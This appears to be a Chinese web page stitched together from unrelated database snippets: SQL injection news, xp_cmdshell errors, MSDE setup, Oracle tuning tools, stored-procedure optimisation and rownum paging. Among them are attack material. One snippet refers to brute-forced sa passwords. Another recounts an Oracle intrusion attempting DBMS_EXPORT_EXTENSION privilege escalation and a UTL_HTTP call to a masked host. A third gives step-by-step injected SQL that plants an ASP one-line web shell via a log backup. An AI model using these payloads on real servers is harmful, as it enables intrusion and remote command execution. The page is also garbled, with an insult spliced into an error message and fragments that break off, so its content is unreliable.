针对数据库的许多黑客行为之所以发生，是因为与这些数据库连接的Web应用程序存在着漏洞。然而，企业越来越多地将最有价值的数据暴露给外部应用程序。在本文中，我们将讨论安全团队、数据库管理员和应用程序开发人员如何协同工作，从而改善前端Web应用程序和后端数据库的防御，防止恶意攻击，并关注最常见的源自Web的数据库攻击。

最近McAfee.com，MySql.com和Sun.com接连被黑，被黑的根源则在于SQL注入攻击--这个被认为是呈下降趋势的漏洞现在变成了数据库安全的责任人。

在查询分析器中经常遇到下面这个错误：Error Message:无法装载 DLL 江湖上到处散布着吃哥屎长大的人 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。
下面是解决方法：
1.
dbcc dropextendedproc ("xp_cmdshell")
2.（执行2次）
drop procedure sp_addextendedproc
drop procedure sp_oacreate
...

很多朋友问有关错误5的问题(Error Message:在执行 xp_cmdshell 的过程中出错。调用 'CreateProcess' 失败，错误代码: '5'。)简单说一下我的认识,大家一起讨论吧.

一.错误5产生的原因
错误5的产生是由于cmd.exe的权限被降权了.
一般我们扫到的sa口令,很多都是system权限的,当cmd.exe的安全选项卡的system权限设置为完全控制-拒绝.

此时运行sql的xp_cmdshell扩展存储指令,就会发生上述错误了.

SQL Server 2000 Desktop Engine (MSDE 2000)是建立在SQL Server的核心技术基础上的数据引擎。通过提供针对于单/双处理器桌面级计算机的支持，MSDE 2000可以为企业级应用的桌面扩展提供可靠的存储引擎和查询处理器。基于SQL Sever与MSDE 2000共同的技术基础，开发者可以将创建的数据库应用无缝地应用于自便携机至集群的各类平台。可以说 (MSDE 2000)是相对于Microsoft Jet的另一种数据存储与管理方案的选择。你可以把MSDE 2000视作一种C/S架构的数据库访问方式，它可以直接安装在WINXP中，而无须专门服务器的支持。但在WINXP+MSDE2000使用过程中会出现一些问题，本文就这些具体问题给出解决方案。
...

当我们对数据库优化诊断时，需要收集相应的信息以供参考，从个人的使用经验来说，这种统计数据分为两大类
一类是数据库级别的统计信息
二类是os级别的统计信息

下面就分别介绍在不同的级别下，常用什么工具来收集信息帮助优化诊断

首先是oracle数据库级别优化分析工具介绍

目录：

1.statspack
2.ASH
3.AWR
4.ORACLE EXPLAIN PLAN的总结(查询sql的执行计划)
...

很快便连接上oracle服务器，此时发现：

    1.连接后不是dba权限

    2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

    3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。

...

字符型

1.恢复当前库
;alter database 当前库 set RECOVERY FULL--

2.创建表cmd
;create table cmd (a image)--

3.备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--

4.插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')-- 

优化存储过程有很多种方法，下面介绍最常用的7种。

1.使用SET NOCOUNT ON选项

我们使用SELECT语句时，除了返回对应的结果集外，还会返回相应的影响行数。使用SET NOCOUNT ON后，除了数据集就不会返回额外的信息了，减小网络流量。

2.使用确定的Schema

在使用表，存储过程，函数等等时，最好加上确定的Schema。这样可以使SQL Server直接找到对应目标，避免去计划缓存中搜索。而且搜索会导致编译锁定，最终影响性能。比如select * from dbo.TestTable比select * from TestTable要好。from TestTable会在当前Schema下搜索，如果没有，再去dbo下面搜索，影响性能。而且如果你的表是csdn.TestTable的话，那么select * from TestTable会直接报找不到表的错误。所以写上具体的Schema也是一个好习惯。

ownum 真的是很好的东西，现在大多数用于存储过程分页. 但怎么用呢？这就来研究一下。 嘿嘿

--- 以下为转载之处，仅供学习

对于rownum来说它是 oracle系统顺序分配为从查询返回的行的编号，返回的第一行分配的是1，第二行是2，依此类推，这个伪字段可以用于限制查询返回的总行数，而且 rownum不能以任何表的名称作为前缀。
举例说明：
例如表：student(学生)表，表结构为：
ID　　　    char(6)　　　　　 --学号
...